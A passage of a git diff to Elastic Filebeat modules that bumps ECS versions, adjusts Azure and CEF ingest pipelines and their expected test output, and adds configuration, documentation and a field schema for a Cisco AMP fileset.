b/x-pack/filebeat/module/azure/auditlogs/config/azure-eventhub.yml index f7894a5c3bf4..7f5eb0915503 100644 --- a/x-pack/filebeat/module/azure/auditlogs/config/azure-eventhub.yml +++ b/x-pack/filebeat/module/azure/auditlogs/config/azure-eventhub.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/azure/auditlogs/config/file.yml b/x-pack/filebeat/module/azure/auditlogs/config/file.yml index d24e13efdcb8..ded48a1474fe 100644 --- a/x-pack/filebeat/module/azure/auditlogs/config/file.yml +++ b/x-pack/filebeat/module/azure/auditlogs/config/file.yml @@ -10,4 +10,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/azure/auditlogs/ingest/pipeline.yml b/x-pack/filebeat/module/azure/auditlogs/ingest/pipeline.yml index e6a29f6cc13d..052fd9d69ae2 100644 --- a/x-pack/filebeat/module/azure/auditlogs/ingest/pipeline.yml +++ b/x-pack/filebeat/module/azure/auditlogs/ingest/pipeline.yml @@ -39,10 +39,11 @@ processors: field: azure.auditlogs.level target_field: log.level ignore_missing: true +- rename: + field: message + target_field: event.original - remove: - field: - - message - - azure.auditlogs.time + field: azure.auditlogs.time ignore_missing: true - convert: field: azure.auditlogs.operationName diff --git a/x-pack/filebeat/module/azure/auditlogs/test/auditlogs.log-expected.json b/x-pack/filebeat/module/azure/auditlogs/test/auditlogs.log-expected.json index 7d18285024a9..3e4e3c643133 100644 --- a/x-pack/filebeat/module/azure/auditlogs/test/auditlogs.log-expected.json +++ b/x-pack/filebeat/module/azure/auditlogs/test/auditlogs.log-expected.json @@ -34,6 +34,7 @@ "event.duration": 0, "event.kind": "event", "event.module": "azure", + "event.original": "{\"category\":\"AuditLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Device Registration Service\",\"level\":\"Informational\",\"operationName\":\"Update device\",\"operationVersion\":\"1.0\",\"properties\":{\"activityDateTime\":\"2019-10-18T15:30:51.0273716+00:00\",\"activityDisplayName\":\"Update device\",\"category\":\"Device\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"id\":\"Directory_ESQ\",\"initiatedBy\":{\"app\":{\"appId\":null,\"displayName\":\"Device Registration Service\",\"servicePrincipalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"servicePrincipalName\":null}},\"loggedByService\":\"Core Directory\",\"operationType\":\"Update\",\"result\":\"success\",\"resultReason\":\"\",\"targetResources\":[{\"displayName\":\"LAPTOP-12\",\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"modifiedProperties\":[{\"displayName\":\"Included Updated Properties\",\"newValue\":\"\\\"\\\"\",\"oldValue\":null}],\"type\":\"Device\"}]},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T15:30:51.0273716Z\"}", "event.outcome": "success", "fileset.name": "auditlogs", "input.type": "log", diff --git a/x-pack/filebeat/module/azure/platformlogs/config/azure-eventhub.yml b/x-pack/filebeat/module/azure/platformlogs/config/azure-eventhub.yml index 496480aa1d0c..80a73bc99058 100644 --- a/x-pack/filebeat/module/azure/platformlogs/config/azure-eventhub.yml +++ b/x-pack/filebeat/module/azure/platformlogs/config/azure-eventhub.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.6.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/azure/platformlogs/config/file.yml b/x-pack/filebeat/module/azure/platformlogs/config/file.yml index e9470671e071..4242dc4cd7b2 100644 --- a/x-pack/filebeat/module/azure/platformlogs/config/file.yml +++ b/x-pack/filebeat/module/azure/platformlogs/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.6.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/azure/platformlogs/ingest/pipeline.yml b/x-pack/filebeat/module/azure/platformlogs/ingest/pipeline.yml index 8493ef886fe2..6d68736bc8b9 100644 --- a/x-pack/filebeat/module/azure/platformlogs/ingest/pipeline.yml +++ b/x-pack/filebeat/module/azure/platformlogs/ingest/pipeline.yml @@ -28,10 +28,11 @@ processors: formats: - ISO8601 - "M/d/yyyy h:mm:ss a XXX" +- rename: + field: message + target_field: event.original - remove: - field: - - message - - azure.platformlogs.time + field: azure.platformlogs.time ignore_missing: true - rename: field: azure.platformlogs.resourceId @@ -62,6 +63,15 @@ processors: field: azure.platformlogs.callerIpAddress target_field: source.ip ignore_missing: true +- set: + field: client.ip + value: '{{source.ip}}' + ignore_empty_value: true +- append: + field: related.ip + value: '{{source.ip}}' + allow_duplicates: false + if: 'ctx.source?.ip != null' - rename: field: azure.platformlogs.level target_field: log.level diff --git a/x-pack/filebeat/module/azure/platformlogs/test/platformlogs-eventhub.log-expected.json b/x-pack/filebeat/module/azure/platformlogs/test/platformlogs-eventhub.log-expected.json index b8a96002e140..4401b205a966 100644 --- a/x-pack/filebeat/module/azure/platformlogs/test/platformlogs-eventhub.log-expected.json +++ b/x-pack/filebeat/module/azure/platformlogs/test/platformlogs-eventhub.log-expected.json @@ -24,6 +24,7 @@ "event.dataset": "azure.platformlogs", "event.kind": "event", "event.module": "azure", + "event.original": "{\"ActivityId\":\"30ed877c-a36b-491a-bd4d-ddd847fe55b8\",\"Caller\":\"Portal\",\"Environment\":\"PROD\",\"EventName\":\"Retreive ConsumerGroup\",\"EventProperties\":\"{\\\"SubscriptionId\\\":\\\"7657426d-c4c3-44ac-88a2-3b2cd59e6dba\\\",\\\"Namespace\\\":\\\"obstesteventhubs\\\",\\\"Via\\\":\\\"sb://obstesteventhubs.servicebus.windows.net/insights-logs-operationallogs/consumergroups?api-version=2017-04\\u0026$skip=0\\u0026$top=100\\\",\\\"TrackingId\\\":\\\"30ed877c-a36b-491a-bd4d-ddd847fe55b8_M2CH3_M2CH3_G3S2\\\"}\",\"EventTimeString\":\"11/3/2020 9:06:42 AM +00:00\",\"Region\":\"West Europe\",\"ScaleUnit\":\"PROD-AM3-AZ501\",\"Status\":\"Succeeded\",\"category\":\"OperationalLogs\",\"resourceId\":\"/SUBSCRIPTIONS/7657426D-C4C3-44AC-88A2-3B2CD59E6DBA/RESOURCEGROUPS/OBS-TEST/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/OBSTESTEVENTHUBS\"}", "event.outcome": "succeeded", "fileset.name": "platformlogs", "input.type": "log", diff --git a/x-pack/filebeat/module/azure/platformlogs/test/platformlogs-kube.log-expected.json b/x-pack/filebeat/module/azure/platformlogs/test/platformlogs-kube.log-expected.json index 59669df1681e..1e5b7cc84e35 100644 --- a/x-pack/filebeat/module/azure/platformlogs/test/platformlogs-kube.log-expected.json +++ b/x-pack/filebeat/module/azure/platformlogs/test/platformlogs-kube.log-expected.json @@ -19,6 +19,7 @@ "event.dataset": "azure.platformlogs", "event.kind": "event", "event.module": "azure", + "event.original": "{\"Cloud\":\"AzureCloud\",\"Environment\":\"prod\",\"category\":\"kube-audit\",\"ccpNamespace\":\"5e4bf4baee195b00017cdbfa\",\"operationName\":\"Microsoft.ContainerService/managedClusters/diagnosticLogs/Read\",\"properties\":{\"log\":\"{\\\"kind\\\":\\\"Event\\\",\\\"apiVersion\\\":\\\"audit.k8s.io/v1\\\",\\\"level\\\":\\\"Metadata\\\",\\\"auditID\\\":\\\"22af12c3-a1fe-4f2c-99a9-3cdde671dbfe\\\"}\",\"pod\":\"kube-apiserver-666bd4b459-hjgdc\",\"stream\":\"stdout\"},\"resourceId\":\"/SUBSCRIPTIONS/70BD6E77-4B1E-4835-8896-DB77B8EEF364/RESOURCEGROUPS/OBS-INFRASTRUCTURE/PROVIDERS/MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/OBSKUBE\",\"time\":\"2020-11-09T10:57:31.0000000Z\"}", "fileset.name": "platformlogs", "input.type": "log", "log.offset": 0, diff --git a/x-pack/filebeat/module/azure/signinlogs/config/azure-eventhub.yml b/x-pack/filebeat/module/azure/signinlogs/config/azure-eventhub.yml index b779113753bb..e37c7c61a4d3 100644 --- a/x-pack/filebeat/module/azure/signinlogs/config/azure-eventhub.yml +++ b/x-pack/filebeat/module/azure/signinlogs/config/azure-eventhub.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/azure/signinlogs/config/file.yml b/x-pack/filebeat/module/azure/signinlogs/config/file.yml index d24e13efdcb8..ded48a1474fe 100644 --- a/x-pack/filebeat/module/azure/signinlogs/config/file.yml +++ b/x-pack/filebeat/module/azure/signinlogs/config/file.yml @@ -10,4 +10,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/azure/signinlogs/ingest/pipeline.yml b/x-pack/filebeat/module/azure/signinlogs/ingest/pipeline.yml index b156d5346d3a..e20115d6b05f 100644 --- a/x-pack/filebeat/module/azure/signinlogs/ingest/pipeline.yml +++ b/x-pack/filebeat/module/azure/signinlogs/ingest/pipeline.yml @@ -18,10 +18,11 @@ processors: ignore_failure: false formats: - ISO8601 +- rename: + field: message + target_field: event.original - remove: - field: - - message - - azure.signinlogs.time + field: azure.signinlogs.time ignore_missing: true - rename: field: azure.signinlogs.resourceId @@ -31,6 +32,15 @@ processors: field: azure.signinlogs.callerIpAddress target_field: source.ip ignore_missing: true +- set: + field: client.ip + value: '{{source.ip}}' + ignore_empty_value: true +- append: + field: related.ip + value: '{{source.ip}}' + allow_duplicates: false + if: 'ctx.source?.ip != null' - rename: field: azure.signinlogs.Level target_field: log.level diff --git a/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json b/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json index db0643ccf25b..75e6eb05bb25 100644 --- a/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json +++ b/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json @@ -37,6 +37,7 @@ "azure.signinlogs.result_signature": "None", "azure.signinlogs.result_type": "50140", "azure.tenant_id": "8a4de8b5-095c-47d0-a96f-a75130c61d53", + "client.ip": "81.171.241.231", "cloud.provider": "azure", "event.action": "Sign-in activity", "event.category": [ @@ -46,6 +47,7 @@ "event.duration": 0, "event.kind": "event", "event.module": "azure", + "event.original": "{\"Level\":4,\"callerIpAddress\":\"81.171.241.231\",\"category\":\"SignInLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"81.171.241.231\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"test@elastic.co\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}", "event.outcome": "failure", "event.type": [ "info" @@ -60,6 +62,9 @@ "log.level": 4, "log.offset": 0, "message": "This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.", + "related.ip": [ + "81.171.241.231" + ], "service.type": "azure", "source.as.number": 8426, "source.as.organization.name": "Claranet Ltd", @@ -118,6 +123,7 @@ "azure.signinlogs.result_signature": "None", "azure.signinlogs.result_type": "50140", "azure.tenant_id": "8a4de8b5-095c-47d0-a96f-a75130c61d53", + "client.ip": "8.8.8.8", "cloud.provider": "azure", "event.action": "Sign-in activity", "event.category": [ @@ -127,6 +133,7 @@ "event.duration": 0, "event.kind": "event", "event.module": "azure", + "event.original": "{\"Level\":4,\"callerIpAddress\":\"8.8.8.8\",\"category\":\"SignInLogs\",\"correlationId\":\"a8d4eb85-90c5-740d-9af6-7a15036cd135\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"81.171.241.231\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"c3813493-bf92-5123-2717-8a8b2979c38b\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}", "event.outcome": "failure", "event.type": [ "info" @@ -141,6 +148,9 @@ "log.level": 4, "log.offset": 1688, "message": "This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.", + "related.ip": [ + "8.8.8.8" + ], "service.type": "azure", "source.as.number": 15169, "source.as.organization.name": "Google LLC", diff --git a/x-pack/filebeat/module/barracuda/spamfirewall/config/input.yml b/x-pack/filebeat/module/barracuda/spamfirewall/config/input.yml index 1a1ed1bc28c8..f4f33a69fe86 100644 --- a/x-pack/filebeat/module/barracuda/spamfirewall/config/input.yml +++ b/x-pack/filebeat/module/barracuda/spamfirewall/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/barracuda/waf/config/input.yml b/x-pack/filebeat/module/barracuda/waf/config/input.yml index 30ae8228f704..26be6dda1154 100644 --- a/x-pack/filebeat/module/barracuda/waf/config/input.yml +++ b/x-pack/filebeat/module/barracuda/waf/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/bluecoat/director/config/input.yml b/x-pack/filebeat/module/bluecoat/director/config/input.yml index 7b8167b42388..a907db353bbf 100644 --- a/x-pack/filebeat/module/bluecoat/director/config/input.yml +++ b/x-pack/filebeat/module/bluecoat/director/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/cef/log/config/input.yml b/x-pack/filebeat/module/cef/log/config/input.yml index 4568f659c3a8..7916908599e3 100644 --- a/x-pack/filebeat/module/cef/log/config/input.yml +++ b/x-pack/filebeat/module/cef/log/config/input.yml @@ -28,7 +28,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 {{ if .external_zones }} - add_fields: diff --git a/x-pack/filebeat/module/cef/log/ingest/pipeline.yml b/x-pack/filebeat/module/cef/log/ingest/pipeline.yml index 676f66a943ae..18a2cda4bf2c 100644 --- a/x-pack/filebeat/module/cef/log/ingest/pipeline.yml +++ b/x-pack/filebeat/module/cef/log/ingest/pipeline.yml @@ -52,35 +52,48 @@ processors: - append: field: related.hash value: "{{cef.extensions.fileHash}}" - if: "ctx?.cef?.extensions?.fileHash != null" + allow_duplicates: false + if: "ctx?.cef?.extensions?.fileHash != null && ctx?.cef?.extensions?.fileHash != ''" - append: field: related.hash value: "{{cef.extensions.oldFileHash}}" - if: "ctx?.cef?.extensions?.oldFileHash != null" + allow_duplicates: false + if: "ctx?.cef?.extensions?.oldFileHash != null && ctx?.cef?.extensions?.oldFileHash != ''" - append: field: related.ip value: "{{destination.ip}}" - if: "ctx?.destination?.ip != null" + allow_duplicates: false + if: "ctx?.destination?.ip != null && ctx?.destination?.ip != ''" - append: field: related.ip value: "{{destination.nat.ip}}" - if: "ctx?.destination?.nat?.ip != null" + allow_duplicates: false + if: "ctx?.destination?.nat?.ip != null && ctx?.destination?.nat?.ip != ''" - append: field: related.ip value: "{{source.ip}}" - if: "ctx?.source?.ip != null" + allow_duplicates: false + if: "ctx?.source?.ip != null && ctx?.source?.ip != ''" - append: field: related.ip value: "{{source.nat.ip}}" - if: "ctx?.source?.nat?.ip != null" + allow_duplicates: false + if: "ctx?.source?.nat?.ip != null && ctx?.source?.nat?.ip != ''" - append: field: related.user value: "{{destination.user.name}}" - if: "ctx?.destination?.user?.name != null" + allow_duplicates: false + if: "ctx?.destination?.user?.name != null && ctx?.destination?.user?.name != ''" - append: field: related.user value: "{{source.user.name}}" - if: "ctx?.source?.user?.name != null" + allow_duplicates: false + if: "ctx?.source?.user?.name != null && ctx?.source?.user?.name != ''" + - append: + field: related.hosts + value: "{{observer.hostname}}" + allow_duplicates: false + if: "ctx?.observer?.hostname != null && ctx?.observer?.hostname != ''" - pipeline: name: '{< IngestPipeline "fp-pipeline" >}' if: "ctx.cef?.device?.vendor == 'FORCEPOINT'" diff --git a/x-pack/filebeat/module/cef/log/test/fp-ngfw-smc.log-expected.json b/x-pack/filebeat/module/cef/log/test/fp-ngfw-smc.log-expected.json index 70ef4f7776ff..3087409c9700 100644 --- a/x-pack/filebeat/module/cef/log/test/fp-ngfw-smc.log-expected.json +++ b/x-pack/filebeat/module/cef/log/test/fp-ngfw-smc.log-expected.json @@ -27,6 +27,9 @@ "observer.product": "Firewall", "observer.vendor": "FORCEPOINT", "observer.version": "6.6.1", + "related.hosts": [ + "10.1.1.40" + ], "service.type": "cef", "tags": [ "cef", @@ -61,6 +64,9 @@ "observer.product": "Firewall", "observer.vendor": "FORCEPOINT", "observer.version": "6.6.1", + "related.hosts": [ + "10.1.1.40" + ], "service.type": "cef", "tags": [ "cef", @@ -108,6 +114,9 @@ "observer.product": "Firewall", "observer.vendor": "FORCEPOINT", "observer.version": "6.6.1", + "related.hosts": [ + "10.1.1.40" + ], "related.ip": [ "10.1.1.40", "10.37.205.252" @@ -161,6 +170,9 @@ "observer.product": "Firewall", "observer.vendor": "FORCEPOINT", "observer.version": "unknown", + "related.hosts": [ + "10.1.1.10" + ], "related.ip": [ "255.255.255.255", "172.16.1.1" @@ -214,6 +226,9 @@ "observer.product": "Firewall", "observer.vendor": "FORCEPOINT", "observer.version": "unknown", + "related.hosts": [ + "10.1.1.1" + ], "related.ip": [ "192.168.1.1", "172.16.1.1" @@ -264,6 +279,9 @@ "observer.product": "Firewall", "observer.vendor": "FORCEPOINT", "observer.version": "unknown", + "related.hosts": [ + "10.1.1.6" + ], "related.user": [ "alice" ], @@ -304,6 +322,9 @@ "observer.product": "Firewall", "observer.vendor": "FORCEPOINT", "observer.version": "unknown", + "related.hosts": [ + "10.1.1.3" + ], "related.ip": [ "192.168.1.1" ], @@ -347,6 +368,9 @@ "observer.product": "Firewall", "observer.vendor": "FORCEPOINT", "observer.version": "unknown", + "related.hosts": [ + "10.1.1.10" + ], "related.ip": [ "192.168.1.1" ], @@ -390,6 +414,9 @@ "observer.product": "Firewall", "observer.vendor": "FORCEPOINT", "observer.version": "unknown", + "related.hosts": [ + "10.1.1.8" + ], "related.ip": [ "172.16.2.1" ], @@ -432,6 +459,9 @@ "observer.product": "Firewall", "observer.vendor": "FORCEPOINT", "observer.version": "6.6.1", + "related.hosts": [ + "10.1.1.40" + ], "service.type": "cef", "tags": [ "cef", diff --git a/x-pack/filebeat/module/checkpoint/firewall/config/firewall.yml b/x-pack/filebeat/module/checkpoint/firewall/config/firewall.yml index e0fa537fc889..1925a535c245 100644 --- a/x-pack/filebeat/module/checkpoint/firewall/config/firewall.yml +++ b/x-pack/filebeat/module/checkpoint/firewall/config/firewall.yml @@ -28,7 +28,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 {{ if .external_zones }} - add_fields: target: _temp_ diff --git a/x-pack/filebeat/module/cisco/_meta/config.yml b/x-pack/filebeat/module/cisco/_meta/config.yml index 77b3658c42b1..3af897a1225a 100644 --- a/x-pack/filebeat/module/cisco/_meta/config.yml +++ b/x-pack/filebeat/module/cisco/_meta/config.yml @@ -120,3 +120,20 @@ #var.visibility_timeout: 300s # Maximum duration before AWS API request will be interrupted #var.api_timeout: 120s + + amp: + enabled: true + + # Set which input to use between httpjson (default) or file. + #var.input: httpjson + + # The API URL + #var.url: https://api.amp.cisco.com/v1/events + # The client ID used as a username for the API requests. + #var.client_id: + # The API key related to the client ID. + #var.api_key: + # How far to look back the first time the module is started. Expects an amount of hours. + #var.first_interval: 24h + # Overriding the default request timeout, optional. + #var.request_timeout: 60s diff --git a/x-pack/filebeat/module/cisco/_meta/docs.asciidoc b/x-pack/filebeat/module/cisco/_meta/docs.asciidoc index c6bdd1854f83..f7f4f44180f7 100644 --- a/x-pack/filebeat/module/cisco/_meta/docs.asciidoc +++ b/x-pack/filebeat/module/cisco/_meta/docs.asciidoc @@ -9,6 +9,7 @@ This is a module for Cisco network device's logs and Cisco Umbrella. It includes filesets for receiving logs over syslog or read from a file: - `asa` fileset: supports Cisco ASA firewall logs. +- `amp` fileset: supports Cisco AMP API logs. - `ftd` fileset: supports Cisco Firepower Threat Defense logs. - `ios` fileset: supports Cisco IOS router and switch logs. - `nexus` fileset: supports Cisco Nexus switch logs. @@ -439,6 +440,86 @@ Maximum duration before AWS API request will be interrupted. Default to be 120 s :fileset_ex!: +[float] +==== `amp` fileset settings + +The Cisco AMP fileset focuses on collecting events from your Cisco AMP/Cisco Secure Endpoint API. + +To configure the Cisco AMP fileset you will need to retrieve your `client_id` and `api_key` from the AMP dashboard. +For more information on how to retrieve these credentials, please reference the https://api-docs.amp.cisco.com/api_resources?api_host=api.amp.cisco.com&api_version=v1[Cisco AMP API documentation]. + +The URL configured for the API depends on which region your AMP is located, currently there are three choices: +- api.amp.cisco.com +- api.apjc.amp.cisco.com +- api.eu.amp.cisco.com + +If new endpoints are added by Cisco in the future, please reference the API URL list located at the https://api-docs.amp.cisco.com/[Cisco AMP API Docs]. + +Example config: + +[source,yaml] +---- +- module: cisco + amp: + enabled: true + var.input: httpjson + var.url: https://api.amp.cisco.com/v1/events + var.client_id: 123456 + var.api_key: sfda987gdf90s0df0 +---- + +When starting up the Filebeat module for the first time, you are able to configure how far back you want Filebeat to collect existing events from. +It is also possible to select how often Filebeat will check the Cisco AMP API. Another example below which looks back 200 hours and have a custom timeout: + +[source,yaml] +---- +- module: cisco + amp: + enabled: true + var.input: httpjson + var.url: https://api.amp.cisco.com/v1/events + var.client_id: 123456 + var.api_key: sfda987gdf90s0df0 + var.first_interval: 200h + var.interval: 60m + var.request_timeout: 120s + var.limit: 100 + +---- + +*`var.input`*:: + +The input from which messages are read. Supports httpjson. + +*`var.url`*:: + +The URL to the Cisco AMP API endpoint, this url value depends on your region. It will be the same region as your Cisco AMP Dashboard URL. + +*`var.client_id`*:: + +The ID for the user account used to access the API. + +*`var.api_key`*:: + +The API secret used together with the related client_id. + +*`var.request_timeout`*:: + +When handling large influxes of events, especially for large enterprises, the API might take longer to respond. This value is to set a custom +timeout value for each request sent by Filebeat. + +*`var.first_interval`*:: + +How far back you would want to collect events the first time the Filebeat module starts up. Supports amount in hours(example: 24h), minutes(example: 10m) and seconds(example: 50s). + +*`var.limit`*:: + +This value controls how many events are returned by the Cisco AMP API per page. + +:has-dashboards!: + +:fileset_ex!: + [float] === Example dashboard diff --git a/x-pack/filebeat/module/cisco/amp/_meta/fields.yml b/x-pack/filebeat/module/cisco/amp/_meta/fields.yml new file mode 100644 index 000000000000..de20fe61484f --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/_meta/fields.yml @@ -0,0 +1,271 @@ +- name: cisco.amp + type: group + release: beta + default_field: false + description: > + Module for parsing Cisco AMP logs. + fields: + - name: timestamp_nanoseconds + type: date + description: > + The timestamp in Epoch nanoseconds. + + - name: event_type_id + type: keyword + description: > + A sub ID of the event, depending on event type. + + - name: detection + type: keyword + description: > + The name of the malware detected. + + - name: detection_id + type: keyword + description: > + The ID of the detection. + + - name: connector_guid + type: keyword + description: > + The GUID of the connector sending information to AMP. + + - name: group_guids + type: keyword + description: > + An array of group GUIDS related to the connector sending information to AMP. + + - name: vulnerabilities + type: flattened + description: > + An array of related vulnerabilities to the malicious event. + + - name: scan.description + type: keyword + description: > + Description of an event related to a scan being initiated, for example the specific directory name. + + - name: scan.clean + type: boolean + description: > + Boolean value if a scanned file was clean or not. + + - name: scan.scanned_files + type: long + description: > + Count of files scanned in a directory. + + - name: scan.scanned_processes + type: long + description: > + Count of processes scanned related to a single scan event. + + - name: scan.scanned_paths + type: long + description: > + Count of different directories scanned related to a single scan event. + + - name: scan.malicious_detections + type: long + description: > + Count of malicious files or documents detected related to a single scan event. + + - name: computer.connector_guid + type: keyword + description: > + The GUID of the connector, similar to top level connector_guid, but unique if multiple connectors are involved. + + - name: computer.external_ip + type: ip + description: > + The external IP of the related host. + + - name: computer.active + type: boolean + description: > + If the current endpoint is active or not. + + - name: computer.network_addresses + type: flattened + description: > + All network interface information on the related host. + + - name: file.disposition + type: keyword + description: > + Categorization of file, for example "Malicious" or "Clean". + + - name: network_info.disposition + type: keyword + description: > + Categorization of a network event related to a file, for example "Malicious" or "Clean". + + - name: network_info.nfm.direction + type: keyword + description: > + The current direction based on source and destination IP. + + - name: related.mac + type: keyword + description: > + An array of all related MAC addresses. + + - name: related.cve + type: keyword + description: > + An array of all related MAC addresses. + + - name: cloud_ioc.description + type: keyword + description: > + Description of the related IOC for specific IOC events from AMP. + + - name: cloud_ioc.short_description + type: keyword + description: > + Short description of the related IOC for specific IOC events from AMP. + + - name: network_info.parent.disposition + type: keyword + description: > + Categorization of a IOC for example "Malicious" or "Clean". + + - name: network_info.parent.identity.md5 + type: keyword + description: > + MD5 hash of the related IOC. + + - name: network_info.parent.identity.sha1 + type: keyword + description: > + SHA1 hash of the related IOC. + + - name: network_info.parent.identify.sha256 + type: keyword + description: > + SHA256 hash of the related IOC. + + - name: file.archived_file.disposition + type: keyword + description: > + Categorization of a file archive related to a file, for example "Malicious" or "Clean". + + - name: file.archived_file.identity.md5 + type: keyword + description: > + MD5 hash of the archived file related to the malicious event. + + - name: file.archived_file.identity.sha1 + type: keyword + description: > + SHA1 hash of the archived file related to the malicious event. + + - name: file.archived_file.identify.sha256 + type: keyword + description: > + SHA256 hash of the archived file related to the malicious event. + + - name: file.attack_details.application + type: keyword + description: > + The application name related to Exploit Prevention events. + + - name: file.attack_details.attacked_module + type: keyword + description: > + Path to the executable or dll that was attacked and detected by Exploit Prevention. + + - name: file.attack_details.base_address + type: keyword + description: > + The base memory address related to the exploit detected. + + - name: file.attack_details.suspicious_files + type: keyword + description: > + An array of related files when an attack is detected by Exploit Prevention. + + - name: file.parent.disposition + type: keyword + description: > + Categorization of parrent, for example "Malicious" or "Clean". + + - name: error.description + type: keyword + description: > + Description of an endpoint error event. + + - name: error.error_code + type: keyword + description: > + The error code describing the related error event. + + - name: threat_hunting.severity + type: keyword + description: > + Severity result of the threat hunt registered to the malicious event. Can be Low-Critical. + + - name: 